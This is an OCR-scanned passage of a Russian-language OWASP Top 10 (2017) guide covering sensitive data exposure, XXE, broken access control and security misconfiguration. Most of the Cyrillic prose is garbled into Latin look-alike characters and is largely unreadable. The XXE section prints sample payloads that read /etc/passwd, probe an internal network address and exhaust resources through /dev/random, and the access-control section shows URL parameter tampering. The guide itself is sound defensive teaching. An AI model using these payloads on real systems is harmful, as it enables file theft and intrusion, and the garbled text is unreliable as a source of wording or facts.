npnjioxeHHeM. OnpeAejiHTe Kaxne H3 hhx hbjihiotch KOHCpHAeHLiHajibHbiMH 
COrJiaCHO 3aK0H3M O HenpHKOCHOBeHHOCTH AaHHbix, HOpMaTHBaM HJIH 6H3HeC- 
Tpe 60 BaHHHM. 

• PeajiH3yHTe TpeSoBaHHn corjiacHO KJiaccncjDHKauHH. 

• He xpaHHTe KOHCpHAeHLiHajibHbie AaHHbie 6e3 Heo6xoAHMOCTH. Cpa3y yAajinHTe 
hx hjih Hcnojib3yHTe TOKeHH3auHio hjih yceneHne, cooTBeTCTByioiAHe ciaHAapiy 
PCI DSS. AaHHbie, KOTOpbie He coxpaHniOTcn, Hejib3n yKpacTb. 

• OSecnenbTe LUHcjDpoBaHHe Bcex xpaHHMbix KOHcjDHAeHUHajibHbix AaHHbix. 

• OSecnenbTe npnMeHeHne coBpeMeHHbix h HaAexHbix ajiropnTMOB, npoTOKOJiOB 
h KJnoHeH, a Taxxe ncnojib3ynTe cooTBeTCTByionHe MexaHH3Mbi ynpaBJieHnn 
KJlHDHaMH. 

• LUHcfDpyHTe Bee nepeAaBaeMbie AaHHbie c noMonbio HaAexHoro npoTOKOJia, 
HanpHMep, TLS c coBepLueHHOH npnMOH ceKpeTHOdbio (PFS), npHopHTH3ai4Hen 
LUHcjDpoB cepBepoM h 6e3onacHbiMH HadpoHKaMH. 06ecneHbTe 
npHHyAHTejibHoe LuncfipoBaHHe, HanpHMep, Hcnojib3yn MexaHH3M 
npHHyAHTejibHoro Hcnojib30BaHHn HTTPS (HSTS). 

• OTKJUOHHTe K3LUHpOBaHHe OTBeTOB, COAepxaLAHX KOHCjDHAeHUHaJlbHbie AaHHbie. 

• CoxpaHHHTe napojiH c noMonbio HaAexHbix, aAanTHBHbix cjDyHKUHH 
XeLUHpOBaHHH C COJlbK) H CfjaKTOpOM TpyAOeMKOCTH (3aAepXKH), T3KHX KaK 

Arqon2 , scrypt . bcrypt hjih PBKDF2 . 

• flpOBepnHTe OTAeJlbHO SCtDCfDeKTHBHOCTb KOHCfDHrypaUHH H HaCTpOHKH. 


npHMepu ci^eHapneB aTaK 

CueHapMM N^I: npnjioxeHHe liinc^pyeT HOMepa KpeAmHbix KapT b 6a3e AaHHbix, 
Hcnojib3yn aBTOMainnecKoe iuHc|DpoBaHHe BA- OAHaxo 3th AaHHbie 
aBTOMaTHnecKH paciuHc|DpoBbiBaK)Tcn npn H3BJieneHHH, no3BOJinn c noMonbio 
BHeApeHHn SQL-KOAa nojiynnib AaHHbie xpeAHTHbix KapT b He3aiuHcjDpoBaHHOM 
BHAe. 

CueHapMM N22: CanT He ncnojib3yeT TLS A-rm Bcex CTpaHHu hjih noAAep>KHBaeT 
HeHaAexHoe liinc^poBaHHe. 3jioyMbiiujieHHHK MoxeT npocMOTpeTb ceTeBOH 
TpacfDHK (HanpHMep, b He6e3onacHon SecnpoBOAHOH ceTH), nepeKJiiOHHTb 
coeAMHeHne c HTTPS Ha HTTP, nepexBaTHTb 3anpocbi h noxHTHTb ceccnoHHbie 
KyKH. Ilocjie 3Toro oh MoxeT ncnojib30BaTb nojiyneHHbie KyKH A-nn nepexBaTa 
ceccHH nojib30BaTejin (npoiiieAiuero ayTeHTHcjDHKauHio), H3MeHHB jiHHHbie 
AaHHbie nojib30BaTejin. TaKxe 3JioyMbiiujieHHHK MoxeT H3MeHHTb Bee 
nepeAaBaeMbie AaHHbie , HanpHMep, nojiynaTejin AenexHoro nepeBOAa. 

CueHapMM N^3: Ajih coxpaHeHHn napojien b 6a3e AaHHbix He Hcnojib3yeTcn cojib 
hjih Hcnojib3yeTcn npocTon ajiropnTM xeiiinpoBaHnn. Yn3BHM0CTb b 3arpy3Ke 
cjDanjiOB no3BOJineT 3JioyMbiiujieHHHKy nojiynHTb BA napojien. Bee xeiu- 
3HaneHHn 6e3 cojih MoryT 6biTb BOCCTaHOBJieHbi c noMonbio paAyxHOH TaSjinubi 
npeAeapHTejibHO paccnHTaHHbix xeiuen. Xeiu-3HaHeHHn, paccHHTaHHbie c 
HCn0Jlb30BaHHeM npOCTblX HJIH SbICTpbIXXeiU-CtDyHKUHH, MOryT SbITb B3J10MaHbl c 
noMOiAbio rpacjDHnecKHx npoueccopoB, Aaxe ecjin A-nn hhx Hcnojib30Bajiacb 
COJlb. 


CCBUIKM 

OWASP 

• flpoaKTHBHan 3amnTa OWASP: 3amHTa ziaHHbix 

• CTaHAapT noATBepxAeHHn 6e3onacHOCTH npnjioxeHHH OWASP (V7.9.10) 

• flaMHTKa OWASP: 3amHTa TpaHcnopTHoro vpobhh 

• flaMHTKa OWASP: 3amnTa KOHcbn/ieHUHajibHOCTH nojib30BaTejieH 

• flaMHTKa OWASP: XpaHeHne napojien h xpaHeHne b 3aujHcbP0BaHH0M BH/ie 

• flpoeKT OWASP: Be3onacHbie 3arojiOBKH ; flaMHTKa no HSTS 

• PvKOBOziCTBO OWASP no TecTHPOBaHHK): flpoBepKa HaziexHOCTH LuncbPOBaHnn 

CTOpOHHMe 

• CWE-202: Pa3rnaLueHHe KOHcbHzieHUHanbHbixziaHHbix, CBB3aHHoe c 3anpocaMH 

• CWE-310: Y513BMMOCTM. CB5i3aHHbie c KpnnTorpac|3MeM : CWE-311: OTCyTCTBMe lumc| 3poBaHmi 

• CWE-312: XpaHeHne KPHTHHHbixziaHHbix b He3aujHcbpoBaHHOM BHne 

• CWE-319: flepeziaMa KPHTHHHbix ziaHHbix b He3aLuncbP0BaHH0M Bnzie 

• CWE-326: HeHaziexHoe LuncbpoBaHne : CWE-327: CKOMnpoMeTHPOBaHHbm 

KPHnToanropHTM 

• CWE-359: Pa3rnameHHe JiHHHbix ziaHHbix (HapyuieHne KOHcbnzieHUHanbHOCTH) 
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BHeuiHHe cymHOCTM XML (XXE 




IrlCTOMMMiM 

Vfpoa 


SaBHCklTOT 

np-kMOJ+LeHHJi 

CflOXHOCTb 
3KcnjiyaTaumi: 2 

PacnpocTpaHeHHocTb: 

2 

CnoxHOCTb 
o6HapyxeHkm: 3 

TexHMHecKne: 3 

A™ 

&M3Heca ? 

I 3AOyMblLAAeHHMKM MOryT 3KCnAyaTMpOBaTb I 

1 no yMOAHaHMIO, 60 AbLAMHCTB 0 ciapbix 06 pa 6 dHMK 0 B XML I 

1 nOA 06 Hbie yA3BMM0CTM MOryT MCnOAb30BaTbCA 1 


* 


BeKTOP'bl 

3T3H 




HEAacraTKM ^ 



Jk 


— / ja n ac riacT m 




ya3BHMbie o6pa6oTHHKn XML nepe3 3arpy3Ky 
XML mam BHeflpeHne BpeflOHOCHoro KomeHTa b 
XML-flOKyMeHTbi, McnoAb3yn yn3BMMbiM koa, 
33BHCHM0CTH MAM KOMflOHeHTbl. 


=1 


HocjKflcrivts 


no3BOJi5qK)T 3aflaBaTb BHeniHue cymHOCTu, URI, KOTopbie 
pa3biMeH0BbiBaK)TCB n BbNncjiflK)TCH npn o6pa6oTKe XML. 

I/I HdpyMembi SAST no3BOAAK)T o6HapyxnTb yn3BMM0CTb nyTeM 
npoBepKM 3aBncnM0CTew n KOHcjDurypaunn. I/I Hdpy Membi PAST 
Tpe6yiOT flonojiHHTejibHbix onepauMM, BbinoAHAeMbix BpyHHyio, atih 
oSHapyxeHHH h 3Kcnjiyaiaunn yB3BHM0dn. TedHpoBLAHKOB, 
BbinojiHHiOLAHx npoBepKH BpyHHyio, HeoSxoflHMO o6ynaTb XXE- 
TedHpoBaHHio, nocKOJibKy nofloSHbie npoBepKH o6biHHO (no 


Aon nojiyneHHH AaHHbix, BbinoAHeHMA 
yAaoeHHbix 3anpocoB c cepBepa, CKaHHpoBaHHH 
BHyTpeHHen CMdeMbi, npoBOunpoBaHnn 0TKa3a 
b o6cjiyxnBaHnn, a Taxxe ocymecTBoeHHH 
ApyrHx aiax. 

nocjiefldBHH atih 6n3Heca 3aBncmoT 
KpHTHHHOCTH 3aLAHTbl BCeX yA3BMMblX 
npmioxeHHH h AaHHbix. 


HBjisieTCsi jim npMjioxeHMe 

YH3BMMBIM? 

npMnoxeHMfl, b oco6eHHocTM Be6-ciiyx6bi mam KOMnoHeHTbi Ha ocHOBe 

XML, HBJiHioTCH yfl3BMMbiMM b CAeAyiOLAMX CAynanx: 

• npmioxeHMe npMHMMaeTXML HanpnMyio mjim nepe3 Bbirpy3Ky, oco6eHHO 
ot HeAOBepeHHbix mctohhmkob, mjim BKJnonaeT HenpoBepeHHbie AaHHbie b 
XML-AOKyivieHTbi, KOTopbie3aTeM o6pa6aTbiBaiOTCflXML-o6pa6oTHMKOM; 

• XOTA 6bl OAMH M3 XML- 06 pa 60 THMK 0 B npMAOXeHMH mam Be6-cjiyx6bi Ha 
ocHOBe SOAP Mcnojib3veT onpeAeAeHMe TMna AOKVMeHTOB (DTD) . 

riOCKOAbKy MexaHM3MOTKAK)HeHMH DTD 33BMCMTOT C> 6 pa 60 THMKa, 
peKOMeHAyeTCH BocnoAb30BaTbcn cnpaBOHHOM MHcpopiviauMeM, 
HanpMMep, 'Tla mat kom OWASP no npeAOTBpaLAeHMioXXE"; 

• npMJioxeHMe McnoAb3yeT SAML p,nn MAeHTMCpMKauMM b paMKax 
cpeAepaTMBHOM 6e3onacHOCTM mam TexHOAomM eAMHoro BXOAa (SSO). 
SAML McnoAb3yeTXML p,nn noATBepxAeHMA MAeHTMcjDMKaiopoB, 
nosTOMy MoxeT 6biTb yn3BMM; 

• npMAOxeHMe McnoAb3yeT SOAP BepcMM HMxe 1.2. Oho MoxeT 6biTb 
yfl3BMMO p,nn XXE-aiax, ecAM XML-cymHOCTM nepeAaiOTCfl cppeMMBopKy 
SOAP; 

• ecAM npMAOxeHMe yA3BMMOA^ XXE-aTaK,TO 3AOyMblLLIAeHHMK MoxeT 
Taxxe Bbi3BaTb otk33 b o6cAyxMBaHMM mam ocyLAecTBMTb aTaxy c 
McnoAb30BaHMeM MMAAMOHaXML-cyiAHOCTeM (Billion Laughs). 


Kaic npeflOTBpaTMTt 

06yHeHMepa3pa6oTHMKOB MMeeT6oAbiiioe3HaHeHMeA-n^ BbmBAeHMA m 
npoTMBOAeMCTBMnXXE. KpoivieToro, A-n^ npeAOTBpameHMflXXE 
Heo 6 xoAMMo: 

• McnoAb30BaTb, no bo3moxhoctm, SoAee npocTbie cpopiviaTbi AaHHbix, 
HanpMMep, JSON, m M36eraTb cepv\anv\3au,m kpmtmhhnx AaHHbix; 

• ydaHOBmb McnpaBAeHMH mam oSHOBAeHMA Ann Bcex 6 m6amot6k m 
o6pa6oTHMKOB XML, McnoAb3yeMbix npMAOxeHMeM mam OC. l/lcnoAb30BaTb 
npoBepKM 3aBMCMM0CTeM. 06HOBMTb SOAP AO BepcMM 1.2 MAM BblLAe; 

• OTKAIOHMTb 06 pa 60 TKy BHeLAHMX CyLAHOCTeM XML M DTD BO Bcex XML- 
o 6 pa 6 oTHMKax npMAOxeHMA, corAacHO "flaMATKe OWASP no 
npeAQTBpameHMio XXE" ; 

• peaAM30BaTb Ha cepBepe (no 6eAbiM cnMCxaM) npoBepxy, cfDMAbTpauMio mam 
OHMCTK y (3KpaHMpoBaHMe) BxoAHbix AaHHbix Ann npeAOTBpaLAeHMA nonaAaHMA 
BpeAOHOCHbIX AaHHbix B XML-AOKyMeHTbl, 33r0A0BKM MAM y3Abi; 

• yAOCTOBepMTbcn, hto cpyHKUMA 3arpy3KM XML mam XSL npoBepneT BxoAHLAMe 
CjDaMAbl C MCn0Ab30BaHMeM XSD MAM APyrOM nOA 06 HOM MeTOAMKM; 

• 3HaAM3MpOBaTb KOA MaCLlJTa 6 HblX M CAOXHbIX npMAOXeHMM CO 
MHOXeCTBOM BCTpaMBaeMbIX KOMnOHeHTOB BpyHHyio, XOTA MHCTpyMeHTbl 
SAST MorymoMOHbo 6 HapyxMTbXXE b mcxoahom KOAe. 

Ecam BbinoAHeHMe AaHHbixTpe6oBaHMM He bo3moxho, nonpo6yMTe 
McnoAb30BaTb BMpTyaAbHbie naTHM, LUAK)3bi 6e3onacHOCTM API mam 
cpaMpBOAbi Be6-npMAOxeHMM (WAF) p,nn o6HapyxeHMA, MOHMTopMHra m 
6 aokmpobkm XXE-aTax. 


npHMepu ci^eHapneB aTaK 

Bbmo 3ac|DMKCMpoBaHO 6oAbwoe KOAMHecTBO XXE-aTaK, BKAionan aTaKM 
Ha BCTpoeHHbie ycipoMCTBa. XXE o6HapyxMBaiOTCA b caMbix 
HeoxMAaHHbix MecTax, BKAionan rAy6oxo BAOxeHHbie 33BMCMMOCTM. 
CaMbiM npocTbiM cnoco6oM peaAM3apMM aiaxM ABAneTcn 3arpy3Ka 
(ecAM noAAepxMBaeTcn) BpeAOHOCHoroXML-cjDaMAa: 

CueHapMM NQ1: 3AoyMbiLiJAeHHMK nbuaeTCA noAynMTb AaHHbie c 
cepBepa: 

<?xml version="1.0" encoding="ISO-8859-1 ,, ?> 
<!DOCTYPEfoo [ 

<!ELEMENT foo ANY > 

<!ENTITYxxe SYSTEM ,, file:///etc/passwd" >]> 
<foo>&xxe;</foo> 

CueHapuM N22: 3noyMbiLUJieHHMK MccneAyeT BHyTpeHHKDK) ceTb 
cepBepa, 3aMeH hr BbiLueyKa3aHHyK> CTpoxy ENTITY Ha: 

<! ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> 

CueHapuM Ne3:3rioyMbiLUJieHHMK nbrraeTCfl Bbi3BaTb otk33 b 
o6cjiyxnBaHMM, ncnojib3ypi noTeHUMa/ibHO 6ecKOHeHHbiM dpav\n\ 
<! ENTITY xxe SYSTEM "filei/Z/dev/random" >]> 


CCBUIKM 

OWASP 

• CTaHflapT noflTBepxfleHHH 6e3onacHOCTH npmioxeHHH 

OWASP 

• PvKOBOACTBO OWASP no TecTHpoBaHHK): flpoBepKa 

BHeapeHHH XML 

• OWASP: Ya3BHM0CTb XXE 

• flaMRTKa OWASP: flpeflOTBpameHne XXE 

• flaMRTKa OWASP: 5e3onacHOCTbXML 

CTOpOHHMe 

• CWE-611 : HeKoppeKTHoe orpaHHHeHHe ccbmoK Ha BHeniHi/ie 

CVLAHOCTH XML 

• ATaxa Billion Laughs (c i/icnorib30BaHMeM MHJiJiHOHa XML- 

cymHOCTeH) 

• ATaxa Ha SAML c ncnorib30BaHneM BHemHMx cymHOCTeH XML 

• Q6HapyxeHne h 3KcrmyaTaunfl XXE b SAML-HHTepcjjeHcax 























































A5 

: 2017 


HeAOCTaTKH KOHTpOJIH 
HOCTyna 



yspoa +-# ■ ■ ■ ■ 






| ^ BeKTOP'bl 
aru\i 


—*/ ■a<fjanjcHacTM 

. 

^ nocneflcrai*! 

SaBHCHIT OT 

npn/io}i4eHkifl 

CflOXHOCTb 
SKcnjiyaTaumi: 2 

PacnpocTpaHeHHOCTb: 

2 

C/lOXHOCTb 

o6HapyxeHki«:2 

TexHMHecKne: 3 

a™ 

SxcnnyaTauMH xoHTporm AOCTyna HBrmeTcn 
OCHOBHbIM HaBbIXOM 3J10yMbllUJieHHMX0B. 

MHCTPVMeHTbi SAST m DAST motvt 
oSHapyxMTb OTcyTCTBi/ie xoHTporm AOCTyna, ho 
He MoryT npoBepMTb ero pa6oTOcnoco6HOCTb 
npw ero Hanmm. HanMHMe xoHTporm AOCTyna 
moxho oSHapyxMTb BpyHHyto, a ero 

OTcyTCTBMe moxho oSHapyxMTb 
aBTOMaTMHecxM b HexoTopbix cjDpeMMBopxax. 

YH3BMM0CTM, CBH3aHHbie C XOHTpOJieM AOCTyna, AOBOJlbHO 
pacnpocTpaHeHbi M3-3a OTcyTCTBMn aBTOMaTMnecxoro o6HapyxeHMn 
m acpcpexTMBHoro cpyHxuMOHanbHoro TecTMpoBaHMn 
pa3pa6oTHnxaMM. 

Komponb AOCTyna o6bNHO He npoBepneTcn aBTOMaTHHecxMMM 
CTaTMHeCXMMM HJIH AHHaMMHeCXMMM TeCTaMH. TeCTMpOBaHHe BpyHHyK) 

- HaHnyHLUHH cnoco6 o6HapyxeHMH OTcyTCTBMH hjih 

He3C|DC|3eXTMBHOCTM XOHTpOJIB AOCTyna, BXJlK)Hafl MeTOAbl HTTP (GET, 
PUT m t. n.), xoHTponnepbi, npnMbie ccbmxi/i Ha o6bexTbi m t. a- 

TexHMHecxMe nocneACTBHn: BbinojiHeHMe 
3/ioyMbiLUJieHHMxoM aomctbmm c npaBaMH 
nojib30BaTejin hjih aAMMHMCTpaTopa; 

ncnojib30BaHne nojib30BaTeneM 
npi/iBmiempoBaHHbix c^yHxuHM; co3AaHne, 
npocMOTp, o6HOBJieHne hjih yAanemie Jix)6bix 
3annceM. 

riocneACTBHH a nn 6n3Heca 3aBi/icnT ot 

XpMTMHHOCTM 3aLAMTbl npMJlOXeHMH M A3HHblX. 


HBJiHeTCH jim npMJioaceHMe ymsbmmbim? 

KoHTpoiibflocTyna npeflnojiaraeT HanMHMe nonMTMXM, onpeAennx)LAeM 

npaBa nonb30BaTeneM. 06xoa orpaHMHeHMM AOCTyna o6bNHO npuBOAHT k 

HeCaHKUMOHMpOBaHHOMy pa3rJiaLIieHMK), M3MeHeHMK) MAM yHMHTOXeHMK) 

AaHHbix, a Taxxe Bbinoni-ieHMK) HenpeAycMOTpeHHbix nonHOMOHMflMM 
6n3Hec-c|DyHKUMM. HawSonee pacnpocipaHeHHbie yn3BMM0CTM xoHTponn 

AOCTyna Bxnx)Hax)T: 

• o6xoa orpaHnneHnw AOdyna nyieM n3MeHeHna URL, BHyipemnero coctoahma 
npmioxeHUfl hjih HTML-cipaHnubi, a TaKxe c noMombK) cneuna/ibHO 
pa3pa6oiaHHbix API; 

• B03M0XH0CTb n3MeHeHH5i nepBHHHoro KJifona An n AOdyna k 3anncflM Apyrux 
nojib30BaiejieM, BXJiKHan npocMOTp hjih peAaKTupoBaHne nyxon yneTHOH 
3anncn; 

• noBbiLueHne npuBn/iernw. Bbino/iHeHne onepaunn c npaBaMH nojib30BaTejin, He 
BXOAH B CHCTeMy, HJIH C npaBaMH aAMHHHCTpaTOpa, BOI4AH B CHCTeMy C npaBaMH 
nojib30BaiejiH; 

• MaHHnyjiHUHH c MeiaAaHHbiMH, HanpnMep, noBTopHoe BOcnpon3BeAeHne hjih 
noAMeHa TOKeHOB xoHTpojin AOdyna JWT hjih xyxH-cpaHJiOB, a TaKxe 
n3MeHeHne CKpbiTbix nojien Ann noBbimeHHH npHBHJiernn hjih HeKoppeKTHoe 
aHHyjiHpoBaHHe JWT; 

• HeCaHKUHOHHpOBaHHbM AOCTyn K API H3-3a HeKOppeKTHOH HaCTpOHKH 
MexAOMeHHoro ncno;ib30BaHHH pecypcoB (CORS); 

• AOCTyn HeayTeHTHcjDHUHpoBaHHbix nojib30BaTejien k CTpaHHuaM, Tpe6yK>mnivi 
ayTeHTnc(3HKaunn, hjih AOCTyn HenpnBHJiernpoBaHHbix nojib30BaTejien k 
npi4BHJiernpoBaHHbiM CTpaHHuaM. flocTyn k API c OTcyTCTByromi/iM xoHTpojieM 
npHBHJierHH Ann POST-, PUT- h DELETE-MeTOAOB/3anpocoB. 


IlppiMepLi cuieHappieB a<raK 

CueHapMM Nsl: npmioxeHne ncnonb3yeT HenpoBepeHHbie Aam-ibie b 
SQL-Bbi30Be, xoTopbiM o 6 paLAaeTcn k MHcjDopMaijMM 06 yneTHOM 3 anncn: 

pstmt.setString(1, request.getParameter("acct")); 

ResultSet results = pstmt.executeQuery(); 

3noyMbii±meHHHK M3Mei-meT b 6pay3epe napaivieTp 'acct' A-rifl ompaBXM 
xenaeMoro HOMepa yneTHon 3anncn. Ee3 AonxHOM npoBepxn aTaxyxjm mm 
MoxeT nonyHMTb AOCTyn k yneTHOM 3anncn nx) 6 oro nonb30BaTenn. 

http://example.com/app/accountlnfo?acct=notmyacct 

CueHapMM N22: 3noyMbiujneHHMX 3aAaeT b 6pay3epe ueneBOM URL. 
flrm AOCTyna k CTpaHMue 3 amMHHCT pi/ipoBaHun Tpe6yx)Tcn npaBa 
aAMMHMCTpaTopa. 

http://example.com/app/getapplnfo 

http://example.com/app/admin_getapplnfo 

Yfl3Bi/iM0CTbcyLAecTByeT, ec/iw noiib30BaTejib 6e3 ayjeHTwdpmaixm 
MoxeT nonyHMTb AOCTyn k stmm CTpaHMuaM v\nv\ ecnn nonb30BaTenb 
6e3 npaB aAMMHMCTpaTopa MoxeT nonyHMTb AOCTyn k CTpahmue 
aAMMHMCTpMpOBaHMH. 


KaK npeflOTBpaTMTt 

KoHTpo/ib AOCTyna 3c|Dc|DexTMBeH TOJibKO npn peajiM3aunM nepe3 npoBepeHHbin 
koa Ha cropoHe cepBepa hjih 6eccepBepHbin API, rAe aTaxyx)LAMM He MoxeT 
M3MeHHTb npoBepxn npaB AOCTyna hjih MeTaAaHHbie. PexoMeHAyeTcn: 

• 3anpeLuaTb AOCTyn no yMOJinaHMK), 3a HCXJiK)HeHHeM OTxpbiTbix pecypcoB; 

• peanM30BaTb MexaHH3Mbi xoHTpojin AOCTyna h ncnojib30BaTb hx bo Bcex 
npmioxeHMHx, a Taxxe MHHMMM3MpoBaTb MexAOMeHHoe ncnojib30BaHne 
pecypcoB; 

• KOHTponi/ipoBaTb AOCTyn k moaojiam, ncnojib3yn BJiaAeHne 3anncnMM, a He 
B03M0XH0CTb n0Jlb30BaTeJieH C03AaBaTb, npOCMaTpilBaTb, 06 H 0 BJlflTb HJIM 
yAa/iHTb jiK)6bie 3anncn; 

• ncnojib30BaTb MOAe/iM AOMeHOB a nn peajiH3auHM cneunajibHbix orpaHMHeHMM, 
OTHOCHLAMXCH K npHJlOXeHHHM; 

• OTKJiKDHMTb BbiBOA cnncxa xaTajioroB Be6-cepBepa, a Taxxe o6ecnenMTb 
OTcyTCTBi/ie MeTaAaHHbix cpaHJioB (HanpnMep, .git) h cpanjiOB pe3epBHbix xon mm 
b xopHeBbix Be6-xaTanorax; 

• perncTpnpoBaTb c6om xohtpojih AOCTyna m yBeAOMJiHTb aAMMHMCTpaTopoB npw 
HeoSxoAMMOCTM (HanpiiMep, ec/in c6om noBTopntOTCH); 

• orpaHHHMBaTb nacTOTy AOCTyna x API m xoHTpojuiepaM Ann MMHMMM3aumi 
ymep6a ot i/iHCTpyivieHTOB aBT0MaTH3aunn aTax; 

• aHHyni/ipoBaTb TOxeHbi JWT Ha cepBepe nocne BbixoAa M3 CMCTeMbi. 

Pa3pa6oTHnxn m MHxeHepbi no xohtpojik) xanecTBa no AonxHbi npoBOAMTb 
cjDyHxuMOHajibHyK) npoBepxy xohtpojih AOCTyna m TecTi/ipoBaTb i/iHTerpauMK). 

CCBUIKM 

OWASP 

• llpoaKTHBHafl 3auxma OWASP: KoHTponb AOCTyna 

• CTaHflapT noflTBepxfleHMR 6e3onacHOCTH npmioxeHMM 

OWASP: V4 KoHTpojibziocTvna 

• PvKOBOiiCTBO OWASP no TecTMpoBaHMK): flpoBepKa 

aBT0pM3aUMM 

• llaMRTKa OWASP: KoHTponb AOCTyna 

CTOpOHHMe 

• CWE-22: HexoppexTHbie orpaHMHeHMn nvTeM Ann KaTanoroB 

(floAMeHa nvTM) 

• CWE-284: HexoppexTHoe vnpaBneHMe AQCTvnoM (ABTopM3auMn) 

• CWE-285: HexoppexTHan aBTopM3auMn 

• CWE-639: 06xoa aBTopM3auMM, Mcnonb3vn 3HaneHMe xnx)na 

nonb3QBaTenn 

• PortSwigaer: SxcnnvaTauMn HexoppexTHO HacTpoem-ioro 

MexAOMeHHoro Mcnonb30BaHMn pecypcoB 
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HeKoppeKTHan HacTpoihca 
napaMeTpoB desonacHocTM 



I- 

MCTOMHbtiM 

yipaa 



BeKTOpbl 

.arak 


i 


$ 


Heflociaiuw 

•□■■j ja u: HacT ri 


-=l 


0 ~C<‘-nC‘PCT2A- 




33BHCHIT0T 

npH/lOJ+LEHHfl 


CllOXHOCTb 

SKcnnyaTaunn: 3 


PacnpocrpaHeHHOCTb: 

3 


CjlOXHOCTb 

o6HapyxeHna:3 


TexHMHecKne:2 


A^fl 

&H3Heca ? 


3noyMbiLUJieHHMKM nacTO nbnajOTca 
SKcnnyaTupoBaTb HencnpaBneHHbie 
yjq3BMMOCTM, HadpoeHHbie no 
yMon Ha hi/ik) yneTHbie 3anncn, 
Hencnonb3yeMbie CTpaHMAbi, 
He3au4nineHHbie cjDanribi n Kaianorn Ann 
nonyHem/m HecaHKunoHnpoBaHHoro 
AOCTyna mjim nHcjDopMaunn o cncieivie. 


HacTpoMxa 6e3onacHocTM MoxeT 6biTb BbinoiiHeHa 
HeKoppeKTHo Ha jik)6om ypoBHe npMJioxeHMM, BXJuoHan 
ceTeBbiecnyx6bi, njiaTcpopMbi, Be6-cnyx6bi, cepBep, 6a3y 
AaHHbix, cppeMMBopKM, koa, a TaKxe npeAyciaHOBneHHbie 
BMpTyaiibHbie MauiMHbi, xoHTeMHepbi nnn xpaHMJiMma. fljin 
noMcxa ya3BMMbix HacTpoex, HacTpoeHHbix no yMOJinaHMio 
yHeTHbix3annceM, HeMcnojib3yeMbixcjiyx6, yciapeBLUHx 
napaMeTpoB m t. n. MoxHoncnojib30BaTb 
aBTOMaTM3npoBaHHbie cKaHepbi. 


riOA06Hbieyfl3BMMOCTM n03B0JlflK)T 
3JioyMbinineHHHKaM nojiyHMTb 
HecaHKUMOHMpoBaHHbiM AOCTyn k 

CMCTeMHbIM AaHHbIM MJIM CpyHKUMHM, a 
Taxxe MoryT npMBecTM k nojiHOM 
KOMnpoMeTaui/m cMCTeMbi. 

riOCJieACTBMH A-H^l 6M3HeCa3aBMCBT OT 
KpMTMHHOCTM3aLAMTbl npMJlOXeHMfl H 
AaHHbix. 


HBJISieTCSI JIM IIpMJIO)K6HM6 yH3BMMLIM? 

npmioxeHMe ya3BMM0, ecrm: 

• J1K)60M M3 KOMnOHeHTOB npMJlOXeHM^ HeAOCTaTOHH0 3aLAMLAeH MJ1M 
pa3peLueHMa oSnaHHbix cepBMcoB HexoppexTHo HacipoeHbi; 

• BKJiioHeHbi mjim npMcyTCTByxrriiMLUHMe cJdyhxumm (HanpMMep, 
HeMcnojib3yeMbie nopTbi, cnyx6bi, CTpaHMijbi, yneTHbiesanMCM mjim 
npMBMiierMM); 

• yneTHbie3anMCM m napoiiM, co3AaBaeMbie noyMonnaHMio, Mcnojib3yK)Tcn 
6e3 M3MeHeHMM; 

• o 6 pa 6 oTKa olum6ok no3BOJineT ocyiAecTBMTb TpaccMpoBKy cTexa mjim 
nojiyHMTb cjiMLUXOM noApo 6 Hbie cooSmeHMA 06 OLUM 6 xax; 

• OTXJIKDHeHbl MJIM HeXOppeXTHO HaCTpoeHbl nOCJieAHMeoSHOBJieHMH 
6e3onacHocTM; 

• He Bbi6paHbi 6e3onacHbie3HaneHMH napaMeTpoB 3aiAMTbi cepBepoB 
npMJioxeHMM, cppeMMBopxoB (HanpMMep, Struts, Spring, ASP.NET), 
6M6jiMOTex MT.n.; 

• cepBep He Mcnojib3yei6e3onacHbie3arojioBXM mjim AnpeKTMBbi, a Taxxe 
ecjiM ohm HexoppexTHo HacTpoeHbi; 

• no ycTapejio mjim MMeeTyn3BMM0CTM (cm. A9:2017-l/lcnojib3QBaHMe 
KOMnOHeHTOB C M3BeCTHblMM VH3BMM0CTHMM ). 

Ee3 opraHM30BaHHOM m peryjinpHO BbinojiHneMOM npoBepxM 6e3onacHOCTM 

npMJioxeHMM CMCTeMbi noABepxeHbi SojibrneMy pMcxy. 


KaK npeflOTBpaTMTB 

Heo6xoAMMO peajiM30BaTb npouecc 6e3onacHOM ycTaHOBXM, BXJitOHan: 

• BocnpoM3BOAMMOCTb npoi_teccoB atia 6bicTporoco3AaHMH 6e3onacHbix, 
M30JiMpoBaHHbixcpeA- CpeAbi A-n^ pa3pa6oTXM, xoHTpojin xanecTBa m 
axcnjiyaTauMM AOJixHbi 6biTb HacTpoeHbi OAMHaxoBO, ho MMeTb pa3Hbie 
yneTHbieAaHHbie. ripoueccbi AOJixHbi 6biTb aBTOMaTM3MpoBaHbi AJifl 
MMHMMM33UMM 3aTpaT Ha C03AaHMe HOBbix 6e3onacHbix epeA; 

• MCn0Jlb30BaHMe nJiaTCpOpM TOJlbXO C HeoSxOAMMbIM HaSopOM CpyHXUMM, 
xoMnoHeHTOB, AOxyMeHTauMM m o6pa3i_tOB. Ya ajiMTe mjim He 
ycTaHaBJiMBaMTejiMLUHMexoMnoHeHTbi mjim cppeMMBopxM; 

• npoBepxy m axTyajiM3auMio napaMeTpoB HacTpoMXM 6e3onacHocTM b 
COOTB eTCTBMM C BbinyCXaeMblMM 6K)JlJieTeHflMM, oSHOBJieHMnMM M 
McnpaBJieHMHMM (cm. A9:2017-Hcnojib3QBaHMexoMnoHeHTOBc 

M3BeCTHblMM yH3BMM0CTHMM ). a TaXXe npOBepxy pa3peLLieHMM oSjiaHHbIX 
xpaHMJiMLA(HanpMMep, A-na xoHTeMHepoB S3); 

• co3AaHMe cerMeHTMpoBaHHOM apxMTexTypbi npMJioxeHMM, 
o6ecneHMBaioLAeM 3cjDc|DexTMBHoe pa3rpaHMHeHMe xoMnoHeHTOB mjim 
xjiMeHTOB c noMOLAbK) xoHTeMHepM3auMM mjim o6jiaHHbix rpynn 
6e3onacHocTM; 

• Mcnojib30BaHMe6e3onacHbixAnpexTMBAJiH xjiMeHTOB, HanpMMep, 

Ee3onacHbix 3arojiOBXOB ; 

• aBTOMaTM3ai4MK) npoBepxM 3(jDC|DeXTMBHOCTM MCnOJlb3yeMblX 
xoHcfDMrypauMM m HacTpoex bo Bcex cpeAax. 


IIpHMep&i cifeHapneB aTaK 

CueHapuM N^l CepBep npMJioxeHMM nocTaBJineTcn c o6pa3uaMM npMJioxeHMM, 
xoTopbie He yflajiHiOTCH c paSonero cepBepa. 3 tm npmioxeHMH coflepxaT 
